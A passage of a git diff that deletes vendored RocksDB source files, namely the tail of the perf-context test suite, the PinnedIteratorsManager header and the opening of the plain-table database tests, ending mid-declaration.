-  HistogramImpl hist_mget_snapshot;
-  HistogramImpl hist_mget_memtable;
-  HistogramImpl hist_mget_files;
-  HistogramImpl hist_mget_post_process;
-  HistogramImpl hist_mget_num_memtable_checked;
-
-  HistogramImpl hist_write_pre_post;
-  HistogramImpl hist_write_wal_time;
-  HistogramImpl hist_write_memtable_time;
-
-  uint64_t total_db_mutex_nanos = 0;
-
-  if (FLAGS_verbose) {
-    std::cout << "Inserting " << FLAGS_total_keys << " key/value pairs\n...\n";
-  }
-
-  std::vector<int> keys;
-  const int kFlushFlag = -1;
-  for (int i = 0; i < FLAGS_total_keys; ++i) {
-    keys.push_back(i);
-    if (i == FLAGS_total_keys / 2) {
-      // Issuing a flush in the middle.
-      keys.push_back(kFlushFlag);
-    }
-  }
-
-  if (FLAGS_random_key) {
-    std::random_shuffle(keys.begin(), keys.end());
-  }
-#ifndef NDEBUG
-  ThreadStatusUtil::TEST_SetStateDelay(ThreadStatus::STATE_MUTEX_WAIT, 1U);
-#endif
-  int num_mutex_waited = 0;
-  for (const int i : keys) {
-    if (i == kFlushFlag) {
-      FlushOptions fo;
-      db->Flush(fo);
-      continue;
-    }
-
-    std::string key = "k" + ToString(i);
-    std::string value = "v" + ToString(i);
-
-    std::vector<std::string> values;
-
-    get_perf_context()->Reset();
-    db->Put(write_options, key, value);
-    if (++num_mutex_waited > 3) {
-#ifndef NDEBUG
-      ThreadStatusUtil::TEST_SetStateDelay(ThreadStatus::STATE_MUTEX_WAIT, 0U);
-#endif
-    }
-    hist_write_pre_post.Add(get_perf_context()->write_pre_and_post_process_time);
-    hist_write_wal_time.Add(get_perf_context()->write_wal_time);
-    hist_write_memtable_time.Add(get_perf_context()->write_memtable_time);
-    hist_put.Add(get_perf_context()->user_key_comparison_count);
-    total_db_mutex_nanos += get_perf_context()->db_mutex_lock_nanos;
-  }
-#ifndef NDEBUG
-  ThreadStatusUtil::TEST_SetStateDelay(ThreadStatus::STATE_MUTEX_WAIT, 0U);
-#endif
-
-  for (const int i : keys) {
-    if (i == kFlushFlag) {
-      continue;
-    }
-    std::string key = "k" + ToString(i);
-    std::string expected_value = "v" + ToString(i);
-    std::string value;
-
-    std::vector<Slice> multiget_keys = {Slice(key)};
-    std::vector<std::string> values;
-
-    get_perf_context()->Reset();
-    ASSERT_OK(db->Get(read_options, key, &value));
-    ASSERT_EQ(expected_value, value);
-    hist_get_snapshot.Add(get_perf_context()->get_snapshot_time);
-    hist_get_memtable.Add(get_perf_context()->get_from_memtable_time);
-    hist_get_files.Add(get_perf_context()->get_from_output_files_time);
-    hist_num_memtable_checked.Add(get_perf_context()->get_from_memtable_count);
-    hist_get_post_process.Add(get_perf_context()->get_post_process_time);
-    hist_get.Add(get_perf_context()->user_key_comparison_count);
-
-    get_perf_context()->Reset();
-    db->MultiGet(read_options, multiget_keys, &values);
-    hist_mget_snapshot.Add(get_perf_context()->get_snapshot_time);
-    hist_mget_memtable.Add(get_perf_context()->get_from_memtable_time);
-    hist_mget_files.Add(get_perf_context()->get_from_output_files_time);
-    hist_mget_num_memtable_checked.Add(get_perf_context()->get_from_memtable_count);
-    hist_mget_post_process.Add(get_perf_context()->get_post_process_time);
-    hist_mget.Add(get_perf_context()->user_key_comparison_count);
-  }
-
-  if (FLAGS_verbose) {
-    std::cout << "Put uesr key comparison: \n" << hist_put.ToString()
-              << "Get uesr key comparison: \n" << hist_get.ToString()
-              << "MultiGet uesr key comparison: \n" << hist_get.ToString();
-    std::cout << "Put(): Pre and Post Process Time: \n"
-              << hist_write_pre_post.ToString() << " Writing WAL time: \n"
-              << hist_write_wal_time.ToString() << "\n"
-              << " Writing Mem Table time: \n"
-              << hist_write_memtable_time.ToString() << "\n"
-              << " Total DB mutex nanos: \n" << total_db_mutex_nanos << "\n";
-
-    std::cout << "Get(): Time to get snapshot: \n"
-              << hist_get_snapshot.ToString()
-              << " Time to get value from memtables: \n"
-              << hist_get_memtable.ToString() << "\n"
-              << " Time to get value from output files: \n"
-              << hist_get_files.ToString() << "\n"
-              << " Number of memtables checked: \n"
-              << hist_num_memtable_checked.ToString() << "\n"
-              << " Time to post process: \n" << hist_get_post_process.ToString()
-              << "\n";
-
-    std::cout << "MultiGet(): Time to get snapshot: \n"
-              << hist_mget_snapshot.ToString()
-              << " Time to get value from memtables: \n"
-              << hist_mget_memtable.ToString() << "\n"
-              << " Time to get value from output files: \n"
-              << hist_mget_files.ToString() << "\n"
-              << " Number of memtables checked: \n"
-              << hist_mget_num_memtable_checked.ToString() << "\n"
-              << " Time to post process: \n"
-              << hist_mget_post_process.ToString() << "\n";
-  }
-
-  if (enabled_time) {
-    ASSERT_GT(hist_get.Average(), 0);
-    ASSERT_GT(hist_get_snapshot.Average(), 0);
-    ASSERT_GT(hist_get_memtable.Average(), 0);
-    ASSERT_GT(hist_get_files.Average(), 0);
-    ASSERT_GT(hist_get_post_process.Average(), 0);
-    ASSERT_GT(hist_num_memtable_checked.Average(), 0);
-
-    ASSERT_GT(hist_mget.Average(), 0);
-    ASSERT_GT(hist_mget_snapshot.Average(), 0);
-    ASSERT_GT(hist_mget_memtable.Average(), 0);
-    ASSERT_GT(hist_mget_files.Average(), 0);
-    ASSERT_GT(hist_mget_post_process.Average(), 0);
-    ASSERT_GT(hist_mget_num_memtable_checked.Average(), 0);
-#ifndef NDEBUG
-    ASSERT_GT(total_db_mutex_nanos, 2000U);
-#endif
-  }
-
-  db.reset();
-  db = OpenDb(true);
-
-  hist_get.Clear();
-  hist_get_snapshot.Clear();
-  hist_get_memtable.Clear();
-  hist_get_files.Clear();
-  hist_get_post_process.Clear();
-  hist_num_memtable_checked.Clear();
-
-  hist_mget.Clear();
-  hist_mget_snapshot.Clear();
-  hist_mget_memtable.Clear();
-  hist_mget_files.Clear();
-  hist_mget_post_process.Clear();
-  hist_mget_num_memtable_checked.Clear();
-
-  for (const int i : keys) {
-    if (i == kFlushFlag) {
-      continue;
-    }
-    std::string key = "k" + ToString(i);
-    std::string expected_value = "v" + ToString(i);
-    std::string value;
-
-    std::vector<Slice> multiget_keys = {Slice(key)};
-    std::vector<std::string> values;
-
-    get_perf_context()->Reset();
-    ASSERT_OK(db->Get(read_options, key, &value));
-    ASSERT_EQ(expected_value, value);
-    hist_get_snapshot.Add(get_perf_context()->get_snapshot_time);
-    hist_get_memtable.Add(get_perf_context()->get_from_memtable_time);
-    hist_get_files.Add(get_perf_context()->get_from_output_files_time);
-    hist_num_memtable_checked.Add(get_perf_context()->get_from_memtable_count);
-    hist_get_post_process.Add(get_perf_context()->get_post_process_time);
-    hist_get.Add(get_perf_context()->user_key_comparison_count);
-
-    get_perf_context()->Reset();
-    db->MultiGet(read_options, multiget_keys, &values);
-    hist_mget_snapshot.Add(get_perf_context()->get_snapshot_time);
-    hist_mget_memtable.Add(get_perf_context()->get_from_memtable_time);
-    hist_mget_files.Add(get_perf_context()->get_from_output_files_time);
-    hist_mget_num_memtable_checked.Add(get_perf_context()->get_from_memtable_count);
-    hist_mget_post_process.Add(get_perf_context()->get_post_process_time);
-    hist_mget.Add(get_perf_context()->user_key_comparison_count);
-  }
-
-  if (FLAGS_verbose) {
-    std::cout << "ReadOnly Get uesr key comparison: \n" << hist_get.ToString()
-              << "ReadOnly MultiGet uesr key comparison: \n"
-              << hist_mget.ToString();
-
-    std::cout << "ReadOnly Get(): Time to get snapshot: \n"
-              << hist_get_snapshot.ToString()
-              << " Time to get value from memtables: \n"
-              << hist_get_memtable.ToString() << "\n"
-              << " Time to get value from output files: \n"
-              << hist_get_files.ToString() << "\n"
-              << " Number of memtables checked: \n"
-              << hist_num_memtable_checked.ToString() << "\n"
-              << " Time to post process: \n" << hist_get_post_process.ToString()
-              << "\n";
-
-    std::cout << "ReadOnly MultiGet(): Time to get snapshot: \n"
-              << hist_mget_snapshot.ToString()
-              << " Time to get value from memtables: \n"
-              << hist_mget_memtable.ToString() << "\n"
-              << " Time to get value from output files: \n"
-              << hist_mget_files.ToString() << "\n"
-              << " Number of memtables checked: \n"
-              << hist_mget_num_memtable_checked.ToString() << "\n"
-              << " Time to post process: \n"
-              << hist_mget_post_process.ToString() << "\n";
-  }
-
-  if (enabled_time) {
-    ASSERT_GT(hist_get.Average(), 0);
-    ASSERT_GT(hist_get_memtable.Average(), 0);
-    ASSERT_GT(hist_get_files.Average(), 0);
-    ASSERT_GT(hist_num_memtable_checked.Average(), 0);
-    // In read-only mode Get(), no super version operation is needed
-    ASSERT_EQ(hist_get_post_process.Average(), 0);
-    ASSERT_EQ(hist_get_snapshot.Average(), 0);
-
-    ASSERT_GT(hist_mget.Average(), 0);
-    ASSERT_GT(hist_mget_snapshot.Average(), 0);
-    ASSERT_GT(hist_mget_memtable.Average(), 0);
-    ASSERT_GT(hist_mget_files.Average(), 0);
-    ASSERT_GT(hist_mget_post_process.Average(), 0);
-    ASSERT_GT(hist_mget_num_memtable_checked.Average(), 0);
-  }
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(PerfContextTest, KeyComparisonCount) {
-  SetPerfLevel(kEnableCount);
-  ProfileQueries();
-
-  SetPerfLevel(kDisable);
-  ProfileQueries();
-
-  SetPerfLevel(kEnableTime);
-  ProfileQueries(true);
-}
-#endif  // ROCKSDB_LITE
-
-// make perf_context_test
-// export ROCKSDB_TESTS=PerfContextTest.SeekKeyComparison
-// For one memtable:
-// ./perf_context_test --write_buffer_size=500000 --total_keys=10000
-// For two memtables:
-// ./perf_context_test --write_buffer_size=250000 --total_keys=10000
-// Specify --random_key=1 to shuffle the key before insertion
-// Results show that, for sequential insertion, worst-case Seek Key comparison
-// is close to the total number of keys (linear), when there is only one
-// memtable. When there are two memtables, even the avg Seek Key comparison
-// starts to become linear to the input size.
-
-TEST_F(PerfContextTest, SeekKeyComparison) {
-  DestroyDB(kDbName, Options());
-  auto db = OpenDb();
-  WriteOptions write_options;
-  ReadOptions read_options;
-
-  if (FLAGS_verbose) {
-    std::cout << "Inserting " << FLAGS_total_keys << " key/value pairs\n...\n";
-  }
-
-  std::vector<int> keys;
-  for (int i = 0; i < FLAGS_total_keys; ++i) {
-    keys.push_back(i);
-  }
-
-  if (FLAGS_random_key) {
-    std::random_shuffle(keys.begin(), keys.end());
-  }
-
-  HistogramImpl hist_put_time;
-  HistogramImpl hist_wal_time;
-  HistogramImpl hist_time_diff;
-
-  SetPerfLevel(kEnableTime);
-  StopWatchNano timer(Env::Default());
-  for (const int i : keys) {
-    std::string key = "k" + ToString(i);
-    std::string value = "v" + ToString(i);
-
-    get_perf_context()->Reset();
-    timer.Start();
-    db->Put(write_options, key, value);
-    auto put_time = timer.ElapsedNanos();
-    hist_put_time.Add(put_time);
-    hist_wal_time.Add(get_perf_context()->write_wal_time);
-    hist_time_diff.Add(put_time - get_perf_context()->write_wal_time);
-  }
-
-  if (FLAGS_verbose) {
-    std::cout << "Put time:\n" << hist_put_time.ToString() << "WAL time:\n"
-              << hist_wal_time.ToString() << "time diff:\n"
-              << hist_time_diff.ToString();
-  }
-
-  HistogramImpl hist_seek;
-  HistogramImpl hist_next;
-
-  for (int i = 0; i < FLAGS_total_keys; ++i) {
-    std::string key = "k" + ToString(i);
-    std::string value = "v" + ToString(i);
-
-    std::unique_ptr<Iterator> iter(db->NewIterator(read_options));
-    get_perf_context()->Reset();
-    iter->Seek(key);
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->value().ToString(), value);
-    hist_seek.Add(get_perf_context()->user_key_comparison_count);
-  }
-
-  std::unique_ptr<Iterator> iter(db->NewIterator(read_options));
-  for (iter->SeekToFirst(); iter->Valid();) {
-    get_perf_context()->Reset();
-    iter->Next();
-    hist_next.Add(get_perf_context()->user_key_comparison_count);
-  }
-
-  if (FLAGS_verbose) {
-    std::cout << "Seek:\n" << hist_seek.ToString() << "Next:\n"
-              << hist_next.ToString();
-  }
-}
-
-TEST_F(PerfContextTest, DBMutexLockCounter) {
-  int stats_code[] = {0, static_cast<int>(DB_MUTEX_WAIT_MICROS)};
-  for (PerfLevel perf_level :
-       {PerfLevel::kEnableTimeExceptForMutex, PerfLevel::kEnableTime}) {
-    for (int c = 0; c < 2; ++c) {
-    InstrumentedMutex mutex(nullptr, Env::Default(), stats_code[c]);
-    mutex.Lock();
-    rocksdb::port::Thread child_thread([&] {
-      SetPerfLevel(perf_level);
-      get_perf_context()->Reset();
-      ASSERT_EQ(get_perf_context()->db_mutex_lock_nanos, 0);
-      mutex.Lock();
-      mutex.Unlock();
-      if (perf_level == PerfLevel::kEnableTimeExceptForMutex ||
-          stats_code[c] != DB_MUTEX_WAIT_MICROS) {
-        ASSERT_EQ(get_perf_context()->db_mutex_lock_nanos, 0);
-      } else {
-        // increment the counter only when it's a DB Mutex
-        ASSERT_GT(get_perf_context()->db_mutex_lock_nanos, 0);
-      }
-    });
-    Env::Default()->SleepForMicroseconds(100);
-    mutex.Unlock();
-    child_thread.join();
-  }
-  }
-}
-
-TEST_F(PerfContextTest, FalseDBMutexWait) {
-  SetPerfLevel(kEnableTime);
-  int stats_code[] = {0, static_cast<int>(DB_MUTEX_WAIT_MICROS)};
-  for (int c = 0; c < 2; ++c) {
-    InstrumentedMutex mutex(nullptr, Env::Default(), stats_code[c]);
-    InstrumentedCondVar lock(&mutex);
-    get_perf_context()->Reset();
-    mutex.Lock();
-    lock.TimedWait(100);
-    mutex.Unlock();
-    if (stats_code[c] == static_cast<int>(DB_MUTEX_WAIT_MICROS)) {
-      // increment the counter only when it's a DB Mutex
-      ASSERT_GT(get_perf_context()->db_condition_wait_nanos, 0);
-    } else {
-      ASSERT_EQ(get_perf_context()->db_condition_wait_nanos, 0);
-    }
-  }
-}
-
-TEST_F(PerfContextTest, ToString) {
-  get_perf_context()->Reset();
-  get_perf_context()->block_read_count = 12345;
-
-  std::string zero_included = get_perf_context()->ToString();
-  ASSERT_NE(std::string::npos, zero_included.find("= 0"));
-  ASSERT_NE(std::string::npos, zero_included.find("= 12345"));
-
-  std::string zero_excluded = get_perf_context()->ToString(true);
-  ASSERT_EQ(std::string::npos, zero_excluded.find("= 0"));
-  ASSERT_NE(std::string::npos, zero_excluded.find("= 12345"));
-}
-
-TEST_F(PerfContextTest, MergeOperatorTime) {
-  DestroyDB(kDbName, Options());
-  DB* db;
-  Options options;
-  options.create_if_missing = true;
-  options.merge_operator = MergeOperators::CreateStringAppendOperator();
-  Status s = DB::Open(options, kDbName, &db);
-  EXPECT_OK(s);
-
-  std::string val;
-  ASSERT_OK(db->Merge(WriteOptions(), "k1", "val1"));
-  ASSERT_OK(db->Merge(WriteOptions(), "k1", "val2"));
-  ASSERT_OK(db->Merge(WriteOptions(), "k1", "val3"));
-  ASSERT_OK(db->Merge(WriteOptions(), "k1", "val4"));
-
-  SetPerfLevel(kEnableTime);
-  get_perf_context()->Reset();
-  ASSERT_OK(db->Get(ReadOptions(), "k1", &val));
-#ifdef OS_SOLARIS
-  for (int i = 0; i < 100; i++) {
-    ASSERT_OK(db->Get(ReadOptions(), "k1", &val));
-  }
-#endif
-  EXPECT_GT(get_perf_context()->merge_operator_time_nanos, 0);
-
-  ASSERT_OK(db->Flush(FlushOptions()));
-
-  get_perf_context()->Reset();
-  ASSERT_OK(db->Get(ReadOptions(), "k1", &val));
-#ifdef OS_SOLARIS
-  for (int i = 0; i < 100; i++) {
-    ASSERT_OK(db->Get(ReadOptions(), "k1", &val));
-  }
-#endif
-  EXPECT_GT(get_perf_context()->merge_operator_time_nanos, 0);
-
-  ASSERT_OK(db->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-
-  get_perf_context()->Reset();
-  ASSERT_OK(db->Get(ReadOptions(), "k1", &val));
-#ifdef OS_SOLARIS
-  for (int i = 0; i < 100; i++) {
-    ASSERT_OK(db->Get(ReadOptions(), "k1", &val));
-  }
-#endif
-  EXPECT_GT(get_perf_context()->merge_operator_time_nanos, 0);
-
-  delete db;
-}
-}
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-
-  for (int i = 1; i < argc; i++) {
-    int n;
-    char junk;
-
-    if (sscanf(argv[i], "--write_buffer_size=%d%c", &n, &junk) == 1) {
-      FLAGS_write_buffer_size = n;
-    }
-
-    if (sscanf(argv[i], "--total_keys=%d%c", &n, &junk) == 1) {
-      FLAGS_total_keys = n;
-    }
-
-    if (sscanf(argv[i], "--random_key=%d%c", &n, &junk) == 1 &&
-        (n == 0 || n == 1)) {
-      FLAGS_random_key = n;
-    }
-
-    if (sscanf(argv[i], "--use_set_based_memetable=%d%c", &n, &junk) == 1 &&
-        (n == 0 || n == 1)) {
-      FLAGS_use_set_based_memetable = n;
-    }
-
-    if (sscanf(argv[i], "--verbose=%d%c", &n, &junk) == 1 &&
-        (n == 0 || n == 1)) {
-      FLAGS_verbose = n;
-    }
-  }
-
-  if (FLAGS_verbose) {
-    std::cout << kDbName << "\n";
-  }
-
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/pinned_iterators_manager.h b/thirdparty/rocksdb/db/pinned_iterators_manager.h
deleted file mode 100644
index 7874eef..0000000
--- a/thirdparty/rocksdb/db/pinned_iterators_manager.h
+++ /dev/null
@@ -1,87 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-#include <algorithm>
-#include <memory>
-#include <utility>
-#include <vector>
-
-#include "table/internal_iterator.h"
-
-namespace rocksdb {
-
-// PinnedIteratorsManager will be notified whenever we need to pin an Iterator
-// and it will be responsible for deleting pinned Iterators when they are
-// not needed anymore.
-class PinnedIteratorsManager : public Cleanable {
- public:
-  PinnedIteratorsManager() : pinning_enabled(false) {}
-  ~PinnedIteratorsManager() {
-    if (pinning_enabled) {
-      ReleasePinnedData();
-    }
-  }
-
-  // Enable Iterators pinning
-  void StartPinning() {
-    assert(pinning_enabled == false);
-    pinning_enabled = true;
-  }
-
-  // Is pinning enabled ?
-  bool PinningEnabled() { return pinning_enabled; }
-
-  // Take ownership of iter and delete it when ReleasePinnedData() is called
-  void PinIterator(InternalIterator* iter, bool arena = false) {
-    if (arena) {
-      PinPtr(iter, &PinnedIteratorsManager::ReleaseArenaInternalIterator);
-    } else {
-      PinPtr(iter, &PinnedIteratorsManager::ReleaseInternalIterator);
-    }
-  }
-
-  typedef void (*ReleaseFunction)(void* arg1);
-  void PinPtr(void* ptr, ReleaseFunction release_func) {
-    assert(pinning_enabled);
-    if (ptr == nullptr) {
-      return;
-    }
-    pinned_ptrs_.emplace_back(ptr, release_func);
-  }
-
-  // Release pinned Iterators
-  inline void ReleasePinnedData() {
-    assert(pinning_enabled == true);
-    pinning_enabled = false;
-
-    // Remove duplicate pointers
-    std::sort(pinned_ptrs_.begin(), pinned_ptrs_.end());
-    auto unique_end = std::unique(pinned_ptrs_.begin(), pinned_ptrs_.end());
-
-    for (auto i = pinned_ptrs_.begin(); i != unique_end; ++i) {
-      void* ptr = i->first;
-      ReleaseFunction release_func = i->second;
-      release_func(ptr);
-    }
-    pinned_ptrs_.clear();
-    // Also do cleanups from the base Cleanable
-    Cleanable::Reset();
-  }
-
- private:
-  static void ReleaseInternalIterator(void* ptr) {
-    delete reinterpret_cast<InternalIterator*>(ptr);
-  }
-
-  static void ReleaseArenaInternalIterator(void* ptr) {
-    reinterpret_cast<InternalIterator*>(ptr)->~InternalIterator();
-  }
-
-  bool pinning_enabled;
-  std::vector<std::pair<void*, ReleaseFunction>> pinned_ptrs_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/plain_table_db_test.cc b/thirdparty/rocksdb/db/plain_table_db_test.cc
deleted file mode 100644
index 0b60332..0000000
--- a/thirdparty/rocksdb/db/plain_table_db_test.cc
+++ /dev/null
@@ -1,1178 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_LITE
-
-#include <algorithm>
-#include <set>
-
-#include "db/db_impl.h"
-#include "db/version_set.h"
-#include "db/write_batch_internal.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/table.h"
-#include "table/bloom_block.h"
-#include "table/meta_blocks.h"
-#include "table/plain_table_factory.h"
-#include "table/plain_table_key_coding.h"
-#include "table/plain_table_reader.h"
-#include "table/table_builder.h"
-#include "util/filename.h"
-#include "util/hash.h"
-#include "util/logging.h"
-#include "util/mutexlock.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "utilities/merge_operators.h"
-
-using std::unique_ptr;
-
-namespace rocksdb {
-class PlainTableKeyDecoderTest : public testing::Test {};
-
-TEST_F(PlainTableKeyDecoderTest, ReadNonMmap) {
-  std::string tmp;
-  Random rnd(301);
-  const uint32_t kLength = 2222;
-  Slice contents = test::RandomString(&rnd, kLength, &tmp);
-  test::StringSource* string_source =
-      new test::StringSource(contents, 0, false);
-
-  unique_ptr<RandomAccessFileReader> file_reader(
-      test::GetRandomAccessFileReader(string_source));
-  unique_ptr<PlainTableReaderFileInfo> file_info(new PlainTableReaderFileInfo(
-      std::move(file_reader), EnvOptions(), kLength));
-
-  {
-    PlainTableFileReader reader(file_info.get());
-
-    const uint32_t kReadSize = 77;
-    for (uint32_t pos = 0; pos < kLength; pos += kReadSize) {
-      uint32_t read_size = std::min(kLength - pos, kReadSize);
-      Slice out;
-      ASSERT_TRUE(reader.Read(pos, read_size, &out));
-      ASSERT_EQ(0, out.compare(tmp.substr(pos, read_size)));
-    }
-
-    ASSERT_LT(uint32_t(string_source->total_reads()), kLength / kReadSize / 2);
-  }
-
-  std::vector<std::vector<std::pair<uint32_t, uint32_t>>> reads = {
-      {{600, 30}, {590, 30}, {600, 20}, {600, 40}},
-      {{800, 20}, {100, 20}, {500, 20}, {1500, 20}, {100, 20}, {80, 20}},
-      {{1000, 20}, {500, 20}, {1000, 50}},
-      {{1000, 20}, {500, 20}, {500, 20}},
-      {{1000, 20}, {500, 20}, {200, 20}, {500, 20}},
-      {{1000, 20}, {500, 20}, {200, 20}, {1000, 50}},
-      {{600, 500}, {610, 20}, {100, 20}},
-      {{500, 100}, {490, 100}, {550, 50}},
-  };
-
-  std::vector<int> num_file_reads = {2, 6, 2, 2, 4, 3, 2, 2};
-
-  for (size_t i = 0; i < reads.size(); i++) {
-    string_source->set_total_reads(0);
-    PlainTableFileReader reader(file_info.get());
-    for (auto p : reads[i]) {
-      Slice out;
-      ASSERT_TRUE(reader.Read(p.first, p.second, &out));
-      ASSERT_EQ(0, out.compare(tmp.substr(p.first, p.second)));
-    }
-    ASSERT_EQ(num_file_reads[i], string_source->total_reads());
-  }
-}
-
-class PlainTableDBTest : public testing::Test,
-                         public testing::WithParamInterface<bool> {
- protected:
- private:
-  std::string dbname_;
-  Env* env_;
-  DB* db_;
-
-  bool mmap_mode_;
-  Options last_options_;
-
- public:
-  PlainTableDBTest() : env_(Env::Default()) {}
-
-  ~PlainTableDBTest() {
-    delete db_;
-    EXPECT_OK(DestroyDB(dbname_, Options()));
-  }
-
-  void SetUp() override {
-    mmap_mode_ = GetParam();
-    dbname_ = test::TmpDir() + "/plain_table_db_test";
-    EXPECT_OK(DestroyDB(dbname_, Options()));
-    db_ = nullptr;
-    Reopen();
-  }
-
-  // Return the current option configuration.
-  Options CurrentOptions() {
-    Options options;
-
-    PlainTableOptions plain_table_options;
-    plain_table_options.user_key_len = 0;
-    plain_table_options.bloom_bits_per_key = 2;
-    plain_table_options.hash_table_ratio = 0.8;
-    plain_table_options.index_sparseness = 3;
-    plain_table_options.huge_page_tlb_size = 0;
-    plain_table_options.encoding_type = kPrefix;
-    plain_table_options.full_scan_mode = false;
-    plain_table_options.store_index_in_file = false;
-
-    options.table_factory.reset(NewPlainTableFactory(plain_table_options));
-    options.memtable_factory.reset(NewHashLinkListRepFactory(4, 0, 3, true));
-
-    options.prefix_extractor.reset(NewFixedPrefixTransform(8));
-    options.allow_mmap_reads = mmap_mode_;
-    options.allow_concurrent_memtable_write = false;
-    return options;
-  }
-
-  DBImpl* dbfull() {
-    return reinterpret_cast<DBImpl*>(db_);
-  }
-
-  void Reopen(Options* options = nullptr) {
-    ASSERT_OK(TryReopen(options));
-  }
-
-  void Close() {
-    delete db_;
-    db_ = nullptr;
-  }
-
-  void DestroyAndReopen(Options* options = nullptr) {
-    //Destroy using last options
-    Destroy(&last_options_);
-    ASSERT_OK(TryReopen(options));
-  }
-
-  void Destroy(Options* options) {
-    delete db_;
-    db_ = nullptr;
-    ASSERT_OK(DestroyDB(dbname_, *options));
-  }
-
-  Status PureReopen(Options* options, DB** db) {
-    return DB::Open(*options, dbname_, db);
-  }
-
-  Status TryReopen(Options* options = nullptr) {
-    delete db_;
-    db_ = nullptr;
-    Options opts;
-    if (options != nullptr) {
-      opts = *options;
-    } else {
-      opts = CurrentOptions();
-      opts.create_if_missing = true;
-    }
-    last_options_ = opts;
-
-    return DB::Open(opts, dbname_, &db_);
-  }
-
-  Status Put(const Slice& k, const Slice& v) {
-    return db_->Put(WriteOptions(), k, v);
-  }
-
-  Status Delete(const std::string& k) {
-    return db_->Delete(WriteOptions(), k);
-  }
-
-  std::string Get(const std::string& k, const Snapshot* snapshot = nullptr) {
-    ReadOptions options;
-    options.snapshot = snapshot;
-    std::string result;
-    Status s = db_->Get(options, k, &result);
-    if (s.IsNotFound()) {
-      result = "NOT_FOUND";
-    } else if (!s.ok()) {
-      result = s.ToString();
-    }
-    return result;
-  }
-
-
-  int NumTableFilesAtLevel(int level) {
-    std::string property;
-    EXPECT_TRUE(db_->GetProperty(
-        "rocksdb.num-files-at-level" + NumberToString(level), &property));
-    return atoi(property.c_str());
-  }
-
-  // Return spread of files per level
-  std::string FilesPerLevel() {
-    std::string result;
-    size_t last_non_zero_offset = 0;
-    for (int level = 0; level < db_->NumberLevels(); level++) {
-      int f = NumTableFilesAtLevel(level);
-      char buf[100];
-      snprintf(buf, sizeof(buf), "%s%d", (level ? "," : ""), f);
-      result += buf;
-      if (f > 0) {
-        last_non_zero_offset = result.size();
-      }
-    }
-    result.resize(last_non_zero_offset);
-    return result;
-  }
-
-  std::string IterStatus(Iterator* iter) {
-    std::string result;
-    if (iter->Valid()) {
-      result = iter->key().ToString() + "->" + iter->value().ToString();
-    } else {
-      result = "(invalid)";
-    }
-    return result;
-  }
-};
-
-TEST_P(PlainTableDBTest, Empty) {
-  ASSERT_TRUE(dbfull() != nullptr);
-  ASSERT_EQ("NOT_FOUND", Get("0000000000000foo"));
-}
-
-extern const uint64_t kPlainTableMagicNumber;
-
-class TestPlainTableReader : public PlainTableReader {
- public:
-  TestPlainTableReader(const EnvOptions& env_options,
-                       const InternalKeyComparator& icomparator,
-                       EncodingType encoding_type, uint64_t file_size,
-                       int bloom_bits_per_key, double hash_table_ratio,
-                       size_t index_sparseness,
-                       const TableProperties* table_properties,
-                       unique_ptr<RandomAccessFileReader>&& file,
-                       const ImmutableCFOptions& ioptions,
-                       bool* expect_bloom_not_match, bool store_index_in_file,
-                       uint32_t column_family_id,
-                       const std::string& column_family_name)
-      : PlainTableReader(ioptions, std::move(file), env_options, icomparator,
-                         encoding_type, file_size, table_properties),
-        expect_bloom_not_match_(expect_bloom_not_match) {
-    Status s = MmapDataIfNeeded();
-    EXPECT_TRUE(s.ok());
-
-    s = PopulateIndex(const_cast<TableProperties*>(table_properties),
-                      bloom_bits_per_key, hash_table_ratio, index_sparseness,
-                      2 * 1024 * 1024);
-    EXPECT_TRUE(s.ok());
-
-    TableProperties* props = const_cast<TableProperties*>(table_properties);
-    EXPECT_EQ(column_family_id, static_cast<uint32_t>(props->column_family_id));
-    EXPECT_EQ(column_family_name, props->column_family_name);
-    if (store_index_in_file) {
-      auto bloom_version_ptr = props->user_collected_properties.find(
-          PlainTablePropertyNames::kBloomVersion);
-      EXPECT_TRUE(bloom_version_ptr != props->user_collected_properties.end());
-      EXPECT_EQ(bloom_version_ptr->second, std::string("1"));
-      if (ioptions.bloom_locality > 0) {
-        auto num_blocks_ptr = props->user_collected_properties.find(
-            PlainTablePropertyNames::kNumBloomBlocks);
-        EXPECT_TRUE(num_blocks_ptr != props->user_collected_properties.end());
-      }
-    }
-  }
-
-  virtual ~TestPlainTableReader() {}
-
- private:
-  virtual bool MatchBloom(uint32_t hash) const override {
-    bool ret = PlainTableReader::MatchBloom(hash);
-    if (*expect_bloom_not_match_) {
-      EXPECT_TRUE(!ret);
-    } else {
-      EXPECT_TRUE(ret);
-    }
-    return ret;
-  }
-  bool* expect_bloom_not_match_;
-};
-
-extern const uint64_t kPlainTableMagicNumber;
-class TestPlainTableFactory : public PlainTableFactory {
- public:
-  explicit TestPlainTableFactory(bool* expect_bloom_not_match,
-                                 const PlainTableOptions& options,
-                                 uint32_t column_family_id,
-                                 std::string column_family_name)
-      : PlainTableFactory(options),
-        bloom_bits_per_key_(options.bloom_bits_per_key),
-        hash_table_ratio_(options.hash_table_ratio),
-        index_sparseness_(options.index_sparseness),
-        store_index_in_file_(options.store_index_in_file),
-        expect_bloom_not_match_(expect_bloom_not_match),
-        column_family_id_(column_family_id),
-        column_family_name_(std::move(column_family_name)) {}
-
-  Status NewTableReader(
